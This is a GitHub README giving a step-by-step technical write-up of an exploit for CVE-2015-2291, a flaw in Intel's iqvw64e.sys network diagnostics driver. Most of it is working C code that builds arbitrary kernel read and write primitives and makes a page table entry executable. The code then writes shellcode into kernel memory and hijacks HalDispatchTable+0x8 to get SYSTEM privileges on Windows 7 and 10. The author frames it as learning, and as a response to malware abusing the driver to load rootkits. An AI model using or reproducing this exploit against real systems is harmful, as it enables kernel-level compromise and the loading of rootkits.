CVE-2015-2291

(1) IQVW32.sys before 1.3.1.0 and (2) IQVW64.sys before 1.3.1.0 in the Intel Ethernet diagnostics driver for Windows allows local users to cause a denial of service or possibly execute arbitrary code with kernel privileges via a crafted (a) 0x80862013, (b) 0x8086200B, (c) 0x8086200F, or (d) 0x80862007 IOCTL call.

Overview

This repository contains a write-up of the vulnerability in question, along with proof-of-concept exploits functional on 64-bit Windows 7 SP1 and Windows 10 20H2. The driver file can be located in the Driver Files directory. If you discover any typos throughout the write-up/paper, or if you would like to see certain details with a more elaborate description, please create an issue on the repository! I will fix them as soon as possible.

Motivation

The motivation behind writing an exploit for this device driver in particular is solely because it is currently being abused in the wild to load an attacker's unsigned root-kit. Using the BYOVD (Bring Your Own Vulnerable Driver) method, malware can check if it is running with elevated privileges, drop a copy of the vulnerable device driver, load the driver, and subsequently exploit it to gain kernel code execution to load the root-kit. I was unable to successfully reverse engineer the malware sample, so I took it upon myself to create the exploit.

Samples spotted in the wild: https://bazaar.abuse.ch/sample/84ed7fec67de5621806dbb43af5167a5fc60ab7f2403448519dc0eca2b8f9022/ https://bazaar.abuse.ch/sample/0925b8985b19d7925d68186d666b0050a4cb3f2a577d64765d770a57a2eab9ae/ https://bazaar.abuse.ch/sample/e8b7f42d544fe8b954c4021315cff2fdd44d67d11704009cdf3037d34e0c0a93/

CVE-2015-2291 - An Exploit's Technical Analysis

The device driver, namely iqvw64e.sys, is a driver designed to perform network adapter diagnostics. It allows the user-mode component to interact with the device driver to perform a plethora of kernel routines by exposing a few IO control codes (also known as IOCTLs), with a "sub" IO control code provided in the user's input buffer during the interaction. The IO control code that will be used to hit the vulnerable code-path is 0x80862007. In addition the primary control code, the aforementioned "sub" IO control codes that will be covered in this analysis will be the 0x33 code to hit the memmove function call, and the 0x30 code to hit the memset function call code-paths. This write-up will not be covering any details regarding the DriverEntry routine, as there is enough documentation on Microsoft's Documentation page to give you a thorough explanation.

To start, we want to know how we can interact with this particular device driver in the first place. The most common means of communicating with a device driver is through the usage of a function named DeviceIoControl. The general idea behind this function is that we can pass a valid driver handle created by CreateFileA, pass in an IO control code that corresponds to the kernel routine we want, pass in a structure (or buffer) that it is expecting, and it will return data in our output buffer. While routines like these can be at times necessary (e.g. accessing model-specific registers for overclocking purposes), they also pose a serious risk to security. But... how?

In the case of CVE-2015-2291, the vulnerability can be triggered by an unprivileged user. Because there are no santization checks present, and administrator privileges are not required to exploit the vulnerability, this poses a security risk. What lies underneath these two flaws, is the ability to fully control the memset and the memmove function calls exposed by the IO control code interface. Remember the aforementioned function DeviceIoControl from before, how we're able to pass in a structure that will be used in a kernel routine? This is how it all comes together.

Let's take a step back. We first want to obtain the driver handle that is related to the vulnerable device driver. Even before this though, we need to locate the correlating named device object. These are exposed to user-space by a symbolic link (commonly hard-coded), which can be found using WinObj, part of the [SysInternals suite]. While we could use a string dumping utility to dump the symbolic link, or alternatively reverse engineer the device driver, I simply loaded the device driver and located it using WinObj. The symbolic link found to be in relation to the device driver is \\.\GLOBALROOT\Device\Nal. To obtain the driver handle, we need to call the CreateFileA function and have it return a valid driver handle for us to use later in the process. The code for this process is as follows:

if (h_nal == (HANDLE)-1)
{
	printf("\n[-] Unable to obtain a driver handle to the Nal device driver. Error: %d (0x%x)", GetLastError(), GetLastError());
	unused = getchar();
	return 1;
}
printf("\n[+] Obtained a driver handle to the Nal device driver. Handle Value: 0x%p", h_nal);

We will be using the driver handle later in the exploitation process. For now, we will begin the preparation of our exploit. The next step would be to load the ntdll.dll library using the LoadLibraryA function to return a module handle, so we can dynamically locate the functions we need. While the ntdll.dll library may already be loaded into our process, we nonetheless need to obtain a handle to the library that we can use. The functions that we need for exploitation are NtQuerySystemInformation to leak the base address of the NT Kernel (with medium process integrity) for later in the exploitation process, and the NtQueryIntervalProfile function to trigger the vulnerability. As for the code to load the ntdll.dll library, it is as follows:

h_ntdll = LoadLibraryA("C:\\Windows\\System32\\ntdll.dll");
if (!h_ntdll)
{
	printf("\n[-] Failed to load the \"ntdll.dll\" API library. Error: %d (0x%x)", GetLastError(), GetLastError());
	unused = getchar();
	return 0;
}
printf("\n[+] Loaded the \"ntdll.dll\" API library. Handle Value: 0x%p", h_ntdll);

Now that we have obtained a handle to the library, we will start off by locating the NtQueryIntervalProfile function. To start, we will need a type definition for this function, as it is undocumented. While you can find the type definition online, I have provided it here for easier access:

typedef unsigned int(__stdcall* NtQueryIntervalProfile)(
	unsigned int      ProfileSource,
	PULONG            Interval
	);

To use this function, we will also need to declare a variable (local or global, up to you) using the NtQueryIntervalProfile type. Now, how do we turn this variable into an actual function? To do this, we will be using a function named GetProcAddress. By passing in a handle to the module we want to search (the first parameter) and passing in the name of the function (the second parameter), we can locate any function we want in the module and retrieve a pointer to that function! Code is provided to help you process this information.

_NtQueryIntervalProfile = (NtQueryIntervalProfile)GetProcAddress(h_ntdll, "NtQueryIntervalProfile");
if (!_NtQueryIntervalProfile)
{
	printf("\n[-] Failed to locate the \"NtQueryIntervalProfile\" function. Error: %d (0x%x)", GetLastError(), GetLastError());
	unused = getchar();
	return 1;
}
printf("\n[+] Located the \"NtQueryIntervalProfile\" function. Function Address: 0x%p", _NtQueryIntervalProfile);

The reason why dynamically loading functions and the ability to use them works is because functions themselves are pointers to executable code. The actual body of a function is the code that will be executed.

Now that we have resolved the NtQueryIntervalProfile function pointer, we still need to retrieve the address of the NtQuerySystemInformation function. Likewise before, we need a type definition for this function, and we will also need to declare a variable for the function to call it. Also as before, I have provided the type definition for ease of access.

typedef NTSTATUS(WINAPI* NtQuerySystemInformation)(
	SYSTEM_INFORMATION_CLASS SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength
	);

And, likewise before, we need to locate the function. The only difference between the previous call to GetProcAddress and this one is the function we are searching for. We can copy the function and change the second parameter to search for our second function. After the code is written, we should have something similar to this:

_NtQuerySystemInformation = (NtQuerySystemInformation)GetProcAddress(h_ntdll, "NtQuerySystemInformation");
if (!_NtQuerySystemInformation)
{
	printf("\n[-] Failed to locate the \"NtQuerySystemInformation\" function. Error: %d (0x%x)", GetLastError(), GetLastError());
	unused = getchar();
	return 0;
}
printf("\n[+] Located the \"NtQuerySystemInformation\" function. Function Address: 0x%p", _NtQuerySystemInformation);

Perfect! We have located all of the nonpresent functions we need. Now, we will need to leak the NT Kernel base address. With the help of NtQuerySystemInformation, we can create a query that will return the base addresses and other information of all of the currently loaded device drivers. The first parameter of the NtQuerySystemInformation function is an enum, specifically one that is not publicly documented. The enum is SystemModuleInformation, which has a corresponding value of 0xB. Then, we will need to pass a pointer to one of the returned structures. The necessary structures and enums are provided below, courtesy of FuzzySecurity (@b33f):

typedef enum _SYSTEM_INFORMATION_CLASS {
	SystemModuleInformation = 0xB,
} SYSTEM_INFORMATION_CLASS;

typedef struct SYSTEM_MODULE {
	ULONG                Reserved1;
	ULONG                Reserved2;
	ULONG				 Reserved3;
	PVOID                ImageBaseAddress;
	ULONG                ImageSize;
	ULONG                Flags;
	WORD                 Id;
	WORD                 Rank;
	WORD                 LoadCount;
	WORD                 NameOffset;
	CHAR                 Name[256];
} SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
	ULONG                ModulesCount;
	SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

But wait, there is more to it! We will need to specify the size of the structure to allocate. Because the size of the structure varies depending on the number of device drivers to retrieve information about, we need to call this function twice; the first function call will be to retrieve the expected size of the structure, and the second function call will be to retrieve information and store it into our structure. To retrieve the size, use the aforementioned SystemModuleInformation enum for the first parameter, pass a pointer to a variable that will store the size of the structure, and pass in 0 (or NULL) for the rest of the left-over parameters. The code should look like this:

_NtQuerySystemInformation(SystemModuleInformation, 0, 0, &return_length);

Easy enough! We have successfully retrieved the size of the expected structure. Now, we need to allocate memory for our variable that will store the information. Using a function named VirtualAlloc, we can allocate stack memory at any address we provide, with any size we want, with our own set of protections, and return a pointer to this memory. For our purposes, we do not need to allocate this memory at a fixed address, so we will pass in 0 to allow the memory manager to choose a location in memory for us. Additionally, we will also need to allocate a block of stack memory with the size returned by NtQuerySystemInformation, which is why we had to store the value. As for the allocation type and the protection parameters, simply use the generic arguments shown in the code below.

module_info = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(0, return_length, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

Now that we have allocated our stack memory for the returned structure, we can now query the system module information, and retrieve a structure containing information of every loaded device driver. To do this, we can reuse our function call to NtQuerySystemInformation from before, and pass in a pointer to the structure (second parameter) and the size of the structure (third parameter). Now, do you have something like this?

status = _NtQuerySystemInformation(SystemModuleInformation, module_info, return_length, &return_length);
if (status)
{
	printf("\n[-] Failed to query system module information. NTSTATUS: %d (0x%x)", status, status);
	unused = getchar();
	return 0;
}
printf("\n[+] Queried system module information.");

Well, I would hope you have something similar. All we have left to do to leak the NT Kernel base address, is by querying our structure! You do not have to compare strings against the driver's name in this case, as the NT Kernel driver information is always at index 0 in this structure. To retrieve the base address of a driver, simply print, store, or return the value of the ImageBaseAddress structure field. It is also good practice to ensure that the pointer is not NULL prior to using it.

if (module_info)
{
	printf("\n[+] Leaked the NT kernel base address. Kernel Base Address: 0x%p", module_info->Modules[0].ImageBaseAddress);
	return (unsigned long long)module_info->Modules[0].ImageBaseAddress;
}

printf("\n[-] Failed to leak the NT kernel base address.");
unused = getchar();
return 0;

We have successfully returned the kernel base address. Now, there is one more step before we begin the exploitation process of this vulnerability. We will need to create a QWORD (a 64-bit integer) pointer that will store our PTE (page table entry) and allocate stack memory for it using VirtualAlloc. The PTEs will be covered later in this paper.

As demonstrated earlier, we will use VirtualAlloc to allocate memory and return a pointer to the block of memory. The code used in my exploit is shown below:

pte_address = (long long*)VirtualAlloc(0, 8, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!pte_address)
{
	printf("\n[-] Failed to allocate stack memory for the leaked page table entry base address pointer. Error: %d (0x%x)", GetLastError(), GetLastError());
	unused = getchar();
	return 1;
}
printf("\n[+] Allocated stack memory for the leaked page table entry base address pointer. Stack Memory Address: 0x%p", (long long*)pte_address);

Now that the last step of the set up process is finished, let's begin the exploitation process!

As mentioned in the earlier parts of the paper, the IO control code that we want to use is IOCTL 0x80862007. But, how do we pass in the "sub" IOCTLs?

A pointer to our user-land input that we pass to the device driver is stored in the rcx register. As we can see in this figure, we noticed that it is simply dereferencing the value at the first QWORD value in the structure that we will pass in. Then, it performs a switch-case on the value obtained.

Scrolling through the decompiled psuedo-code, we find two routines that allow us to control all three values of memset and memove respectively. By passing in a value of 0x30 as the first QWORD in the structure, we can hit the memset code-path. Alternatively, by passing in a value of 0x33 as the first QWORD in the structure, we hit the memmove code-path instead. These two code-paths are depicted below respectively.

From looking at the input buffer's offsets used, we were able to create structures for both of these functions to pass in, for easier reading. Take note that there is a QWORD field that is being used as padding. While we will not set its value to anything, we need this field in order for our structure definition to be correct. Additionally, take note of the parameters used in the calls to these routines. During the reverse engineering process, we learned that the parameters passed in are in the correct order with their respective function definitions. Figures indicating this have also been provided below. The memset code-path input structure:

typedef struct _MEMSET_INPUT_BUFFER
{
	unsigned long long JumpTableCode;	// Offset: 0x0 (0)
	unsigned long long Padding1;		// Offset: 0x8 (8)
	unsigned long long Value;		// Offset: 0x10 (16)
	unsigned long long Destination;		// Offset: 0x18 (24)
	unsigned long long Length;		// Offset: 0x20 (32)
} MEMSET_INPUT_BUFFER, * PMEMSET_INPUT_BUFFER;

The memmove code-path input structure:

typedef struct _MEMMOVE_INPUT_BUFFER
{
	unsigned long long JumpTableCode;	// Offset: 0x0 (0)
	unsigned long long Padding1;		// Offset: 0x8 (8)
	unsigned long long* Source;		// Offset: 0x10 (16)
	unsigned long long* Destination;	// Offset: 0x18 (24)
	unsigned long long Length;		// Offset: 0x20 (32)
} MEMMOVE_INPUT_BUFFER, * PMEMMOVE_INPUT_BUFFER;

After quick analysis, it was safe to assume that these will provide us with an arbitrary kernel read and write exploit primitive. This is perfect for exploitation on Windows 10, as we do not need to convert any exploit primitives to arbitrary reads and writes, and thus allows us to exploit this vulnerability with ease.

To begin, we will be using our memmove exploit primitive to read the nt!MiGetPteAddress+0x13 kernel function. At this offset in the function, we find that there is an arbitrary value. Combined with the other operations that can be done in our exploit, we can calculate the base address of all of the PTEs! Remember the pte_address variable that we created earlier? Or, do you remember the leaking of the NT Kernel base address? All of the exploit preparation discussed previously made this possible. The code for calculating the base address of all PTEs is depicted below. Take note of the KUSER_SHARED_DATA address, as in Windows 10 20H2, this was one of the last few regions of memory left in the kernel that was not affected by kernel ASLR (Address Space Layout Randomization).

unsigned long long kuser_shared_data_loc = 0xFFFFF78000000050;
current_pte_address = kuser_shared_data_loc >> 9;
current_pte_address &= 0x7FFFFFFFF8;

memmove_input_struct.JumpTableCode = 0x33;
memmove_input_struct.Source = nt_base_address + MI_GET_PTE_ADDRESS_PLUS_0X13_OFFSET;
memmove_input_struct.Destination = pte_address;
memmove_input_struct.Length = 0x8;

DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
current_pte_address += *pte_address;
printf("\n[+] Calculated page table entry address. Page Table Entry Address: 0x%p", (unsigned long long*)current_pte_address);

Now that we have calculated the base address of our target page's PTE, we want to dereference this address and retrieve the bits that the page entry is using. We will need this data shortly to change this region of memory to read, write, and executable. We changed the source address in our structure to point towards our PTE address, and changed the destination field to point to a stack variable to store the retrieved bits, not changing any other field in the input structure.

unsigned long long current_pte_contents = 0;

memmove_input_struct.Source = current_pte_address;
memmove_input_struct.Destination = &current_pte_contents;
DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
printf("\n[+] Dereferenced page table entry address. Page Table Entry Bits: 0x%llx", current_pte_contents);

Now that we have the bit contents of the actual PTE, we want to mark it as executable without flipping other bits on or off. To do so, we want to clear the highest-level bit in the retrieved value to remove the NX (no execute) bit. Thankfully, we can use a bitwise AND operation on the stored value, AND'ing the value 0x0FFFFFFFFFFFFFFF to accomplish this task. We will then trigger a write to the kernel address using our arbitrary write primitive, to overwrite the value stored at the PTE's address. As for our structure, we will modify the source structure field to point to our stored bits, and change the destination to point back to the PTE address. This is essentially in the opposite order of retrieving the PTE's address. This is demonstrated with the code snippet below.

current_pte_contents &= 0x0FFFFFFFFFFFFFFF;
memmove_input_struct.Source = &current_pte_contents;
memmove_input_struct.Destination = current_pte_address;
DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
printf("\n[+] Marked the page table entry as executable. New Page Table Entry Bits: 0x%llx", current_pte_contents);

Before we continue, we will want to verify that the PTE's contents were overwritten before continuing. If the bit overwrite fails, we will crash the machine (with a KERNEL_SECURITY_CHECK_FAILURE or equivalent bug check). To verify this, we will be using the !pte command in WinDbg to confirm our overwrite worked as intended.

Upon examination of the PTE bits, we can see that the NX-bit is no longer present! This means that the KUSER_SHARED_DATA region of memory is now executable. While we are dealing with this region of memory, it only makes sense to place the kernel payload somewhere here. After performing analysis of the chunk of memory, we learned that an offset of 0x50 from the base of the KUSER_SHARED_DATA region is freed memory. This is the perfect location to place our payload!

Remember our memset write primitive from earlier? Using this primitive, we can iterate through all of the bytes in our kernel payload, and write every individual byte to this region of memory using memset. While it is possible to use memmove to write the payload to this location, we wanted an excuse to use both primitives, to demonstrate how one or the other can be abused, especially under full control. We will be using the 0x30 jump code to hit the memset code-path, with a length of 0x1 bytes to be written. The destination will have to be incremented by one to point to the next byte of freed memory, along with the offset of our kernel payload. This process can be demonstrated with the provided for loop below.

for (int i = 0; i < sizeof(shellcode); i++)
{
	memset_input_struct.Destination = kuser_shared_data_loc + i;
	memset_input_struct.Value = shellcode[i];
	DeviceIoControl(h_nal, TARGET_IOCTL, &memset_input_struct, sizeof(memset_input_struct), &output, sizeof(output), &bytes_returned, 0);
}
printf("\n[+] Wrote kernel payload at address 0x%llx.", kuser_shared_data_loc);

While triggering a vulnerability numerous times is a risk for crashing the machine, this is an exception, due to the overall stability of the device driver and its (mis)used routines. For our next step, we want to retrieve the original function pointer stored at nt!HalDispatchTable+0x8. This retrieved function pointer will be used in the recovery step, and will prevent our machine from randomly crashing due to accessing an incorrect function pointer. While this step is not too important on Windows 7, as our payload execution function is not called frequently, its usage has increased in the later builds of Windows 10. As always, we will store the returned pointer to a local variable on our stack by abusing our read primitive once more! We will also be using our leaked NT Kernel base address once again, this time pairing it with an offset to the nt!HalDispatchTable with an additional offset of 0x8.

memmove_input_struct.Source = nt_base_address + HAL_DISPATCH_TABLE_PLUS_0X8_OFFSET;
memmove_input_struct.Destination = &recovery_address;
DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
printf("\n[+] Retrieved the recovery address. Recovery Address: 0x%llx", recovery_address);

Just a couple more steps to go! After we have successfully stored the original pointer in the dispatch table, it is now time to overwrite the same pointer with our KUSER_SHARED_DATA+0x50 address, which will translate to 0xFFFFF78000000050. At this point, everything is ready to go, and we are ready to root the system! Simply change the source of the pointer overwrite to what was formerly the destination, and pass a pointer to our local variable containing our address for the source field.

memmove_input_struct.Destination = nt_base_address + HAL_DISPATCH_TABLE_PLUS_0X8_OFFSET;
memmove_input_struct.Source = &kuser_shared_data_loc;
DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
printf("\n[+] Overwrote an arbitrary kernel function pointer located in the \"HalDispatchTable+0x8\" function table.\n[!] Executing kernel payload...");
_NtQueryIntervalProfile(2, &interval);

The NtQueryIntervalProfile function is known for using pointers from the HAL dispatch table, specifically the 0x8 offset, and it is commonly abused for this reason. With the ability to arbitrarily write to kernel memory, this is one of the easiest exploitation techniques there are! At this point in our exploit, we have nt authority\system privileges, but we want to do just one last step before spawning our beautiful shell: clean-up and recovery.

This will be bundled into one step, as they are both simple. We will be using both arbitrary write primitives one last time. To start, we will begin by removing all of our shellcode from kernel space. This is an easy task, as we can use the same for loop to iterate through the length of our payload. This time, we will be overwriting the memory with zeros instead, exactly how it was prior to our exploit execution.

for (int i = 0; i < sizeof(shellcode); i++)
{
	memset_input_struct.Destination = kuser_shared_data_loc + i;
	memset_input_struct.Value = 0;
	DeviceIoControl(h_nal, TARGET_IOCTL, &memset_input_struct, sizeof(memset_input_struct), &output, sizeof(output), &bytes_returned, 0);
}
printf("\n[+] Removed the kernel payload from kernel memory.");

I do not believe I have to explain the for loop iterations any further. The last step in the recovery process (and exploitation process in general) is to restore the original function pointer at nt!HalDispatchTable+0x8. Using our memmove structure data that was originally used to overwrite one of the many pointers in nt!HalDispatchTable, all we have to do is modify the source field to pass a pointer to the original address. As before, I do not believe I need to explain this part any further ($1 if you can count how many times I have repeated myself!).

memmove_input_struct.Source = &recovery_address;
DeviceIoControl(h_nal, TARGET_IOCTL, &memmove_input_struct, sizeof(memmove_input_struct), &output, sizeof(output), &bytes_returned, 0);
printf("\n[+] Restored the original function pointer.");

And now, you get to have your fun. Spawn that system shell!

$Proof of nt authority\system privileges$

Overall, this was a very fun bug to exploit. The exploitation process was not as complicated as I was thinking it would have been. It also allowed me to get more comfortable with PTE manipulations, and allowed me to create my first ever local privilege escalation exploit that is not abusing HackSys Extreme Vulnerable Driver! I hope to see you guys around soon.

Credits

HackSys Team; Creating the HackSys Extreme Vulnerable Driver for me to practice on
Connor McGarr; Creating an excellent paper on manipulating page table entries
Fuzzy Security; Creating the first kernel exploitation tutorials I ever read
The Offensive Security Discord; Providing me with assistance and tips throughout learning, and providing an amazing community to talk to
The Security Community (as a whole); Providing me with the motivation I needed to keep going

gmh5225/CVE-2015-2291

CVE-2015-2291

Overview

Motivation

CVE-2015-2291 - An Exploit's Technical Analysis

Credits